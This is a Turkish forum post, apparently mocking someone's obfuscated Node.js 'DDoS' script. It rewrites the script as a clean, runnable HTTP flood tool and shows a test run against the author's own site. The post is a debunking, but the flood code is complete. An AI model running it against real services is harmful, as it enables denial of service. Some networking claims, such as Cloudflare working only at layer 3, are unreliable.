arkadaşlar layer 7 dediğiniz şey application layer yani HTTP/HTTPS'in çalıştığı layer, cloudflare gibi proxy/WAF'lar layer 3'de (Network Layer) çalışıyor (IP'nin olduğu layer - IP block atıyo ya hani)
AYRICA bu DDoS değil DoS, çünkü ortada distrubuted (dağıtılmış) bir saldırı söz konusu değil, saldırdığınız servisin spesifik bir açığı olmadıkça sadece düz HTTP
istekleri ile hiçbir siteyi çökertemezsiniz, tam tersine kendi bandwidthinizi yersiniz, daha sonrada routerınız o attığınız paketleri işeleyene kadar siteye bağlanamazsınız - yani bir bakıma
kendinizi DoS etmiş olursunuz, zaten günümüzde kullanılan NAT yapıları DoS saldırıları için çok elverişsiz durumda - NAT'in paketleri işlemesi klasik bir ağ yapısına göre daha uzun sürüyor
çünkü (hele CGI NAT'deyseniz paketleri direk ISP'niz bile düşürebilir)
onun dışında attığı script obsfucate edilmiş bir de - az dalga geçiyim:
JavaScript:
function _0x5c56() {
var _0x1299a6 = ['ELinks/0.11.0\x20(textmode;\x20Linux;\x20100x24-2)', (kestim)]
_0x5c56 = function() {
return _0x1299a6;
};
return _0x5c56();
}
bi sürü user agent döndüren bir fonksiyon, user agent değiştirerek WAF bypass edemezsiniz, daha sonrasında ilginç bir şekilde bir liste daha tanımlı - o da user agent listesi olarak görünüyor
JavaScript:
process[_0x2e230b(0x426)][_0x2e230b(0x576)] <= 0x2 && (console['log'](_0x2e230b(0x4e9)), console[_0x2e230b(0x274)]('Edit\x20by\x20Blackjack\x20&\x20Salihpy'
tabi her gerçek hekırmen gibi ekrana adımızı basmazsak olmaz aga
JavaScript:
_0x4fc6dc = require(_0x3e9b8b(0x659))['Socket']();
_0x4fc6dc[_0x3e9b8b(0x498)](0x50, host), _0x4fc6dc[_0x3e9b8b(0x2e9)](0x2710);
for (var _0x480d6b = 0x0; _0x480d6b < 0x32; _0x480d6b++) {
_0x4fc6dc['write'](kestim));
}
_0x4fc6dc['on'](_0x3e9b8b(0x216), function() {
setTimeout(function() {
var _0x28b5f2 = _0x4990;
return _0x4fc6dc[_0x28b5f2(0x6b7)](), delete _0x4fc6dc;
}, 0x1388);
});
bağlantıları gerçek chad gibi socketle yolucaksın tabi - yoo hayır bi boka yaradığından değil fetchleyip responseda stream'i de kapatabilirsin ama böyle
daha havalı oluyor değil mi
JavaScript:
setTimeout(() => clearInterval(int), time * 0x3e8);
interval ile de sürekli istek gönderiyoruz, her neyse ben size bu kodun temiz versiyonunu yazıyım:
JavaScript:
const net = require("net");
const url = require("url");
function randomUser() {
const agents = [
"ELinks/0.11.0 (textmode; Linux; 100x24-2)",
// diğer user agentlar
];
const randomIndex = Math.floor(Math.random() * agents.length);
return agents[randomIndex];
}
process.on("uncaughtException", function(error) {
console.error("Uncaught exception:", error);
});
process.on("unhandledRejection", function(reason) {
console.error("Unhandled rejection:", reason);
});
if (process.argv.length <= 2) {
console.log("Usage: node script.js [target] [time]");
console.log("Edit by ngn best ddos script frfr no cap on god");
process.exit(-1);
}
const target = process.argv[2];
const parsed = url.parse(target);
const host = parsed.host;
const time = process.argv[3];
function interval() {
const socket = new net.Socket();
socket.connect(80, host);
socket.setTimeout(10000);
for (let i = 0; i < 50; i++) {
socket.write(
`GET ${target} HTTP/1.1\r\nHost: ${parsed.host}\r\nUser-Agent: ${randomUser()}\r\n\r\n`
);
}
socket.on("data", function(data) {
console.log("Received data:", data.toString());
});
socket.on("close", function() {
console.log("Socket closed");
});
socket.on("error", function(error) {
console.error("Socket error:", error);
});
socket.on("timeout", function() {
console.log("Socket timeout");
socket.destroy();
});
};
setInterval(interval, time * 1000);
aldığımız responseları ekrana basması için editledim gördüğünüz gibi
bunu ngn13.fun üzerinde çalıştıralım bakalım
Kod:
ngn on artixbtw in /tmp # node hekırmen.js https://ngn13.fun 1
Received data: HTTP/1.1 301 Moved Permanently
Date: Thu, 06 Jul 2023 20:09:44 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Cache-Control: max-age=3600
Expires: Thu, 06 Jul 2023 21:09:44 GMT
Location: https://ngn13.fun/
Report-To: ...(kestim)
Server: cloudflare
CF-RAY: 7e2a7cb4cd390533-OTP
alt-svc: h3=":443"; ma=86400
daha attığımız ilk istekten blok yedik xd
sonuç olarak arkadaşlar 2012de yaşamıyoruz anonimuz olup her yere DoS atabileceğiniz bir dünya yok artık, DDoS saldırıları içinse milyonlarca cihazlara sahip botnetler gerekiyor
böyle saftirik js scriptleri ile bir yere varamazsınız
her neyse iyi güldüm
